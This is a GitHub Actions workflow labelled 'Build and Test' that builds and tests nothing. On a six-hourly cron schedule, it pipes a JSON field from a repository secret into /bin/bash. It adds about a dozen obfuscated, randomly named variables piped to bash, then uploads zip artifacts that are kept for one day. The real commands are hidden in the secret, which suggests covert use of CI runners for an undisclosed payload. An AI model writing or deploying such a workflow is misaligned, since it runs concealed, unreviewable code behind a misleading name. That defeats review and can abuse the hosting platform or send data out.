name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '34 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          w5: ${{ secrets.w5 }}
        run: |
          printf '%s' "$w5" | jq -r .fcwo0235 | /bin/bash
          echo $rhmx10 | jq -r .g7 | /bin/bash
          echo $lgau3 | jq -r .cmb4684 | /bin/bash
          printf '%s' "$qkk52" | jq -r .h96183 | /bin/bash
          printf '%s' "$tndho63681" | jq -r .nctys3 | /bin/bash
          echo $xufqx43 | jq -r .ljpys94 | /bin/bash
          echo $diw48445 | jq -r .d40 | /bin/bash
          echo $mmnzo2 | jq -r .x5812 | /bin/bash
          echo $f12 | jq -r .yxktn16619 | /bin/bash
          echo $ktj3 | jq -r .o23 | /bin/bash
          printf '%s' "$nex47825" | jq -r .p8 | /bin/bash
          printf '%s' "$icol305" | jq -r .vwta75 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: ZlvN65GV
          path: "*.zip"
          retention-days: 1
